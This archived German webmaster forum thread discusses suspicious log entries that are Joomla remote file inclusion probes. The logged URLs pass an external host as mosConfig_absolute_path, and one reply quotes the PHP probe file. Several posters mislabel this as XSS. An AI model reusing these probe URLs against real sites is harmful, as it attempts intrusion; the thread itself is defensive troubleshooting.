Hack-Zugriff?
Redaktionelle Einordnung
Diese archivierte Diskussion behandelt Hack-Zugriff? aus Sicht der Rubrik Webentwicklung Sonstige.
Sicherheits- und HTTPS-Themen wirken heute direkt auf Vertrauen, Rendering-Stabilität und technische Risiken der Website ein.
Sinnvoll nutzbar bleibt der Thread vor allem als historischer Kontext, für typische Fragestellungen und zur Einordnung älterer Empfehlungen.
Einige im historischen Thread genannte Tools, Dienste oder externe Links könnten heute nicht mehr verfügbar oder inhaltlich überholt sein. Nutzen Sie sie bitte nur mit zusätzlicher Prüfung.
Startbeitrag
Originaler Foreninhalt in modernisierter Darstellung.
Salut,
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Antworten
7 BeiträgeHallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.
Raptor schrieb:
Salut,
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Hallo Flo,
der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?
hansen
Nepal Rundreisen
der_booker schrieb:
Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.
Ich denke eher nicht, dass es damit einen Zusammenhang gibt. Warum sollte durch diesen Test eine solche Seite aufgerufen werden?
Es sieht mir mehr nach versuchtem XSS aus.
Unter der angegebenen Seite (ujcar.deva.rdsnet.ro/images/id1???) lässt sich folgenden Inhalt sehen: <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
der_booker schrieb:
der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?
Ich weiss jetzt nicht worauf du hinaus willst. Ich denke nicht, dass es was mit einer Suche zu tun hat.
Die Log-Einträge sehen etwa so aus:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
/webscripting/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1?...
/webscripting/target-blank-in-xhtml-1-1/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar...
kein Referrer und mit Agent "Mozilla/5.0".
XSS , denke ich auch
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Das zweite sieht nach einer Suchanfrage aus
Raptor schrieb:
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus..
Die mosConfig Zugriffe sind immer Angriffe auf vermeintliche Joomla Systeme (und oft erfolgreich).
Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. ltere Versionen dagegen sind sehr anfllig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt ber obige Methode einen kompletten Backend Zugriff).
Wenn kein Joomla verwendet wird, sind die Angriffe mehr oder weniger harmlos.
Gruß,
Matthias
SEO Analyse und Website-Check mit Seitenreport
seitenreport schrieb:
Die mosConfig Zugriffe auf Joomla sind immer Angriffe (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. ltere Versionen dagegen sind sehr anfllig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt ber obige Methode einen kompletten Backend Zugriff).
Wie kann ein CMS nur so unsicher sein...
Wobei, ArtRef ist doch eine Erweiterung?
seitenreport schrieb:
Welche Joomla Version verwendest Du?
Wie gesagt, ich benutze Joomla gar nicht. (Ich benutze überhaupt kein CMS.)
Irgendeine Folge (ausser 404 Not Found) hatten die Zugriffe deshalb auch nicht.
Ja, die Art-dings-bums ist ne Erweiterungs-Komponente. Wenn man alle server und php einstellungen richtig macht, kann da nichts per xss gemacht werden.
Das was am unsichersten ist, sind die Erweiterungen. Da werden kaum varieablen abgeklopft.